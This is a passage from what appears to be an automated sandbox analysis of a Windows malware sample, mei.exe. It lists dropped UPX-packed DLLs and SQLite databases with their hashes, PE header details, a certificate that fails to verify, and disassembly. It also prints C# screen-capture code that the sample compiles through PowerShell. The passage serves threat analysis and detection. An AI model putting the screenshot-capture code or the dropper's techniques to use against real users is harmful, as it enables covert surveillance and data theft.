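```

Point `triage()` at the bytes of a real dropped file to compare its output with the record above it; a PE whose section names come back as UPX0/UPX1 should be unpacked (UPX's own `-d` normally works when the packer has not been tampered with) before any static analysis, since the packed image's strings and imports tell you almost nothing.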
Process:C:\Users\user\Desktop\mei.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):26392
Entropy (8bit):7.44233047444268
Encrypted:false
SSDEEP:384:oUAW1guHrh0h1d4NZa7gJXZjNIVQG86lHQIYiSy1pCQfwug+AM+o/8E9VF0NyciC:ojW1JVpJjNIVQG8S5YiSyv3g+AMxkEdC
MD5:1E9E36E61651C3AD3E91ABA117EDC8D1
SHA1:61AB19F15E692704139DB2D7FB3AC00C461F9F8B
SHA-256:5A91BA7EA3CF48033A85247FC3B1083F497BC060778DCF537CA382A337190093
SHA-512:B367E00E1A8A3E7AF42D997B59E180DFCA7E31622558398C398F594D619B91CEDC4879BFDDA303D37F31DFCC3447FAA88F65FD13BAC109889CEE8C1E3C1D62D0
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t.q|'.q|'.q|'...'.q|'q.}&.q|'q.y&.q|'q.x&.q|'q..&.q|'..}&.q|'.q}'.q|'..}&.q|'..q&.q|'..|&.q|'...'.q|'..~&.q|'Rich.q|'........PE..d......e.........." ...#.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\Desktop\mei.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):637720
Entropy (8bit):7.993300822314004
Encrypted:true
SSDEEP:12288:NevMEHnoed8VDT4Rc+iHsLG56RY+hPQHAnxeIglZsk2F24ZHL2Ubsi2V4G2:N8oy8x4Rl1dRnxeDlZxsl2MsDVr2
MD5:C78FAB9114164AC981902C44D3CD9B37
SHA1:CB34DFF3CF82160731C7DA5527C9F3E7E7F113B7
SHA-256:4569ACFA25DDA192BECDA0D79F4254CE548A718B566792D73C43931306CC5242
SHA-512:BF82CCC02248BE669FE4E28D8342B726CF52C4EC2BFE2EC1F71661528E2D8DF03781AE5CCF005A6022D59A90E36CEA7D3C7A495BD11BF149319C891C00AC669B
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W..W..W..^.P.[....U....Z...._.....S.....T..W........V.....V....<.V......V..RichW..........................PE..d......e.........." ...#.`...0.......*.......................................p............`..........................................K..."...H.......@.......................m.......................................7..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\Desktop\mei.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1124744
Entropy (8bit):6.664084865885705
Encrypted:false
SSDEEP:24576:JJG9DZM19A7ieC9dQ8dDtLV8+BaC6EOx/cEz5RmxvSZX0ypHNHe:e/qtvdhq+BaPHxxd0
MD5:8F53604F28132832353C099FADB2A54C
SHA1:7679E25D80E7D551C390E6AC6F7561BF2368F734
SHA-256:5D652E1BA943587035B573E0DBCDC8A2F114030AC5CAE4894805CC228DDA3D22
SHA-512:5B7E3775A0ECA8ADE32E092287342F20C80BA3F96CE2008EFF5A68E0AC952087F4A19CA5F6A7BF1E3A8ADD8AED49EC8168238461F777445104BAE9D89B99A43A
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7=iNVS:NVS:NVS:G..:{VS:NVR:.VS:...:OVS:..S;OVS:..P;}VS:..V;.VS:..W;.VS:..];wTS:...:OVS:..Q;OVS:RichNVS:........PE..d....#j..........." .....0...........w..............................................f.....`A................................................................. ..0........)......$...0...p............................Z..@..............(............................text...e%.......0.................. ..`.rdata......@.......@..............@..@.data....&....... ..................@....pdata..0.... ......................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\mei.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):302872
Entropy (8bit):7.986782854548308
Encrypted:false
SSDEEP:6144:Kk/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9KiQ/y:KkUfQJbUV2MhCwEQc5Np9zQ6
MD5:AF87B4AA3862A59D74FF91BE300EE9E3
SHA1:E5BFD29F92C28AFA79A02DC97A26ED47E4F199B4
SHA-256:FAC71C7622957FE0773214C7432364D7FC39C5E12250FF9EAAEEA4D897564DC7
SHA-512:1FB0B8100DFFD18C433C4AA97A4F2DA76FF6E62E2EF2139EDC4F98603BA0BB1C27B310B187B5070CF4E892FFC2D09661A6914DEFA4509C99B60BCBB50F70F4A0
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4m..4m..4m..=...2m......6m......9m......<m......7m......7m......6m..4m..em......5m......5m....j.5m......5m..Rich4m..................PE..d......e.........." ...#.`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...^..................@....rsrc................b..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown

Process:C:\Users\user\Desktop\mei.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):126976
Entropy (8bit):0.47147045728725767
Encrypted:false
SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:false
Reputation:unknown

Process:C:\Users\user\Desktop\mei.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:dropped
Size (bytes):159744
Entropy (8bit):0.7873599747470391
Encrypted:false
SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:false
Reputation:unknown

Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.114663539189021
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryFwak7Ynqq81PN5Dlq5J:+RI+ycuZhNgakSsPNnqX
MD5:DADA2FBCA79F9EA3D820A4E11758CD7E
SHA1:7865FCEB755E04A8F287CC198C7A731FB2E3C312
SHA-256:E1D3A5353335BA301452FB714CC518C73CED9F759FBE004655F673C4623A1031
SHA-512:23E05E2D5A552F0247F4CF77477AFFC36DD044AC83C9E80EED1E287907691D6533EEEBC47555AEF559F73A2EC20752DF5C3B85E3BB8051385AFED55057CDD171
Malicious:false
Reputation:unknown

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1004
Entropy (8bit):4.154581034278981
Encrypted:false
SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:C76055A0388B713A1EABE16130684DC3
SHA1:EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:false
Reputation:unknown
Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:dropped
Size (bytes):607
Entropy (8bit):5.348297667294841
Encrypted:false
SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOf8FWZEif8A:V3ka6KOkqeFkOftEifZ
MD5:08F16455FC37A5C69707AA44F34DC99B
SHA1:EA271B340DEB08A53850B33C96D46B8B5C82D8BF
SHA-256:911D9998566409CCCE2EF51E1E43B75192454D5DF67A818E0D88F7DEDB38C661
SHA-512:5375EF30E6ED2569E1A2AFCBBE39D8B8908D1E11A9C2B3D9030A9E0046B8CCEF7C1C739FE88728CA54C5293182B7B03E0213EBF440DAD73ECF93E1F77CF390C2
Malicious:true
Reputation:unknown
Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.0.cs"

Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):4096
Entropy (8bit):3.159055411680021
Encrypted:false
SSDEEP:48:6r7oEAtf0KhzBU/ef6mtJ5N0xpW1ulga38q:dNz0hmBOReK
MD5:69B7387AB0B8B0E79B92AEB468B27409
SHA1:F693E0EC43FBB1B60AF0613BEFF5E2B01490D23D
SHA-256:9A70B06A196D31AA9DF9B3E4BF1E05E2015DEE5C046F308CF7715EF14C96E0BA
SHA-512:0791C5B1EB8D12D08D5E81365AE7F74ECCAFF34370DF3F2FE2CDC30237726F6D04A955237A45111314F6D06DB86CA2E8CDF24F305E347AA911C69EEE36A9D957
Malicious:true
Reputation:unknown

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
Category:modified
Size (bytes):1147
Entropy (8bit):5.500661152759543
Encrypted:false
SSDEEP:24:KJfvId3ka6KOkqeFkOftEifcKax5DqBVKVrdFAMBJTH:uvkka6NkqeFkytEucK2DcVKdBJj
MD5:8A59FFFF1D43C090DFBB4E11AD3CDE01
SHA1:459628311284319D5CADCBE9ADA3481D42764AB1
SHA-256:B41EBA522F77095324D79BF086C56BE135C2825CFDD768B4F29230976958DF6B
SHA-512:BE3C0698BBB70033947F50B8CD7394C504FB9808E378C12DE4F815483D0CFF584B4E1F16137DCD8E82B325B57350A9BFE779876DAD4242B84EDB1F553FB8CA57
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer
                                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):97
                                                                                                                                                                    Entropy (8bit):4.331807756485642
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                    MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                    SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                    SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                    SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.994244096439802
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                    File name:mei.exe
                                                                                                                                                                    File size:8'593'769 bytes
                                                                                                                                                                    MD5:b5479bf5c97cfa81c02676bb9335ab24
                                                                                                                                                                    SHA1:e823a36420bdeccfd8e4c6ad9d14e863263caac7
                                                                                                                                                                    SHA256:02c36b712aeaad34359c72311c8624062ea5dfc6311a15ed2b46b403470c3bc0
                                                                                                                                                                    SHA512:7fd4dac8048bb1952f479bd14e32d0ceced93a546ae1c966fef0710cf195f45da077e045c3b383f6c8e3151f27b7c63b1906080102640f704efb6319b7142acf
                                                                                                                                                                    SSDEEP:196608:7x0cD9zMLjv+bhqNVoBKUh8mz4Iv9PzQ1u1D7wJM:Ki9zcL+9qz8/b4IC1uRmM
                                                                                                                                                                    TLSH:1F863325A3850CE5E82B963AC286D11E9B7336631760D5DB53F897392F038E5D83BB02
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y~M..-M..-M..-...,E..-...,...-...,G..-X..-I..-X..,e..-X..,\..-X..,D..-...,F..-M..-...-t..,X..-t..,L..-RichM..-...............
                                                                                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                                                                                    Entrypoint:0x14000c1a0
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                    Time Stamp:0x656EB46D [Tue Dec 5 05:26:05 2023 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                    OS Version Minor:2
                                                                                                                                                                    File Version Major:5
                                                                                                                                                                    File Version Minor:2
                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                    Subsystem Version Minor:2
                                                                                                                                                                    Import Hash:1af6c885af093afc55142c2f1761dbe8
                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                    Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                    Error Number:-2146869232
Not Before: 29/09/2021 01:00:00
Not After: 29/09/2024 00:59:59
                                                                                                                                                                    Subject Chain
                                                                                                                                                                    • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                    Version:3
                                                                                                                                                                    Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                    Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                    Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                    Serial:00BFB15001BBF592D4962A7797EA736FA3
                                                                                                                                                                    Instruction
                                                                                                                                                                    dec eax
                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                    call 00007F4B44D8944Ch
                                                                                                                                                                    dec eax
                                                                                                                                                                    add esp, 28h
                                                                                                                                                                    jmp 00007F4B44D8905Fh
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    dec eax
                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                    call 00007F4B44D899C4h
                                                                                                                                                                    test eax, eax
                                                                                                                                                                    je 00007F4B44D89203h
                                                                                                                                                                    dec eax
                                                                                                                                                                    mov eax, dword ptr [00000030h]
                                                                                                                                                                    dec eax
                                                                                                                                                                    mov ecx, dword ptr [eax+08h]
                                                                                                                                                                    jmp 00007F4B44D891E7h
                                                                                                                                                                    dec eax
                                                                                                                                                                    cmp ecx, eax
                                                                                                                                                                    je 00007F4B44D891F6h
                                                                                                                                                                    xor eax, eax
                                                                                                                                                                    dec eax
                                                                                                                                                                    cmpxchg dword ptr [000342CCh], ecx
                                                                                                                                                                    jne 00007F4B44D891D0h
                                                                                                                                                                    xor al, al
                                                                                                                                                                    dec eax
                                                                                                                                                                    add esp, 28h
                                                                                                                                                                    ret
                                                                                                                                                                    mov al, 01h
                                                                                                                                                                    jmp 00007F4B44D891D9h
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    inc eax
                                                                                                                                                                    push ebx
                                                                                                                                                                    dec eax
                                                                                                                                                                    sub esp, 20h
                                                                                                                                                                    movzx eax, byte ptr [000342B7h]
                                                                                                                                                                    test ecx, ecx
                                                                                                                                                                    mov ebx, 00000001h
                                                                                                                                                                    cmove eax, ebx
                                                                                                                                                                    mov byte ptr [000342A7h], al
                                                                                                                                                                    call 00007F4B44D897C3h
                                                                                                                                                                    call 00007F4B44D8A8E2h
                                                                                                                                                                    test al, al
                                                                                                                                                                    jne 00007F4B44D891E6h
                                                                                                                                                                    xor al, al
                                                                                                                                                                    jmp 00007F4B44D891F6h
                                                                                                                                                                    call 00007F4B44D97781h
                                                                                                                                                                    test al, al
                                                                                                                                                                    jne 00007F4B44D891EBh
                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                    call 00007F4B44D8A8F2h
                                                                                                                                                                    jmp 00007F4B44D891CCh
                                                                                                                                                                    mov al, bl
                                                                                                                                                                    dec eax
                                                                                                                                                                    add esp, 20h
                                                                                                                                                                    pop ebx
                                                                                                                                                                    ret
                                                                                                                                                                    int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0003426Ch], 00000000h
mov ebx, ecx
jne 00007F4B44D89249h
cmp ecx, 01h
jnbe 00007F4B44D8924Ch
call 00007F4B44D8992Ah
test eax, eax
je 00007F4B44D8920Ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3cdc4 | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x46000 | 0x94c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x42000 | 0x2280 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x82fd21 | 0x2448 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x47000 | 0x75c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3a330 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3a1f0 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x420 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29b40 | 0x29c00 | False | 0.5530735404191617 | data | 6.486836379301198 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0x12bec | 0x12c00 | False | 0.5183854166666667 | data | 5.835118207850638 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x3338 | 0xe00 | False | 0.1328125 | Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 0 | 1.8271683819747706 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x42000 | 0x2280 | 0x2400 | False | 0.4736328125 | data | 5.3141353008647245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x45000 | 0x15c | 0x200 | False | 0.388671875 | data | 2.7898294787301503 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x46000 | 0x94c | 0xa00 | False | 0.4359375 | data | 5.115392825790756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x47000 | 0x75c | 0x800 | False | 0.5458984375 | data | 5.240127521097618 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x460a0 | 0x39c | data | | | 0.474025974025974
RT_MANIFEST | 0x4643c | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857
DLL | Import
USER32.dll | CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll |
